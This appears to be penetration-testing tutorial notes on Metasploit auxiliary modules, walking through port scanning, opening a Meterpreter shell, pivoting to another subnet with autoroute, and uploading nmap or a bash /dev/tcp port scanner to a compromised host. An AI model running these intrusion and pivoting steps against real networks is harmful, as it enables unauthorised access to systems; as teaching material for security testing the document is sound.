Auxiliary modules in Metasploit are used for tasks like scanning, discovery, and fuzzing. They can perform both TCP and UDP port scans and gather information from services like FTP, SSH, and HTTP. These modules are useful during both the information-gathering and post-exploitation phases of a penetration test. Once initial access is obtained, auxiliary modules can be used to discover hosts and scan ports on different network subnets. Their primary function is to extract information rather than exploit vulnerabilities directly.
Demo: Attacking, Pivoting, Discovery
Imagine you’re tasked with infiltrating a target network. Your first step is to use auxiliary modules to identify open ports on your initial target. After uncovering a vulnerable service, you exploit it, securing a foothold within the system. With this access, you pivot into a different network subnet, gaining a pathway to other systems. From there, you use auxiliary modules again to scan for open ports on a second target. How would you approach this plan?
Goals
Discover open ports on your first target?
Exploit the service running on the target to gain an initial foothold?
Utilize that foothold to pivot and access other systems on a different network subnet?
Scan for open ports on the second target using auxiliary modules?
Execution
# 1. Search for port scanning auxiliary modules
search portscan
# 2. Select the desired port scanning module by number or name from the search results
use number/name
# 3. Display options to configure the module
show options # To review the required and optional parameters for the module
# 4. Set the target IP address for port scanning
set RHOSTS [IP1] # Replace [IP1] with the target's IP address
# 5. Execute the port scan
run # Starts the port scanning process
# ---- Meterpreter Session: Post-exploitation ----
# 6. Open an interactive shell in the compromised machine
meterpreter > shell
# 7. Start a bash shell on the remote target
/bin/bash -i # Interact with the target's shell
# 8. Check the network configuration to identify interfaces and potential routes for pivoting
ifconfig # View the network interfaces to see the available network subnets
# ---- Pivoting: Accessing another network ----
# 9. Set up pivoting through the compromised machine to reach another network (IP2)
meterpreter > run autoroute -s [IP2] # Add a route to the new subnet, allowing scanning of [IP2]
# 10. Return the Meterpreter session to the background so other commands can be run
background # Background the current session to continue scanning
# 11. List active Meterpreter sessions to resume if needed
sessions # Display the active sessions for further actions
# ---- Repeat for the second target (IP2) ----
# 12. Search for a port scanning auxiliary module again for the second target
search portscan
# 13. Use the selected module for port scanning
use number/name
# 14. Show the options to configure the new scan
show options
# 15. Set the RHOSTS to the IP address of the second target
set RHOSTS [IP2] # Replace [IP2] with the second target’s IP
# 16. Run the port scan on the second target
run # Start scanning the second target
autoroute: Sets up pivoting to access other subnets.
Network route refers to the path or set of rules that data packets follow to reach a destination across a network. In penetration testing, manipulating network routes (e.g., using the autoroute command in Meterpreter) allows pivoting, where access to one compromised system enables interaction with other network segments.
Meterpreter sessions are interactive command-line interfaces that allow an attacker to control a compromised system after an exploit succeeds. These sessions provide access to various tools for further exploitation, privilege escalation, and post-exploitation activities like running commands, uploading/downloading files, or pivoting.
Alternative Post Exploitation
Copying nmap to Victim 1
file /usr/bin/nmap #to check the nmap file
sessions -i 1 #start the meterpreter session
upload /usr/bin/nmap /tmp/nmap
Copying a scanner to Victim 1
# bash based port scanner
#!/bin/bash
for port in {1..1000}; do
timeout 1 bash -c "echo >/dev/tcp/$1/$port" 2>/dev/null && echo "port $port is open"
done
upload /root/bash-port-scanner.sh /tmp/bash-port-scanner.sh
cd /tmp
chmod +x ./bash-port-scanner.sh
./bash-port-scanner.sh [Victim2]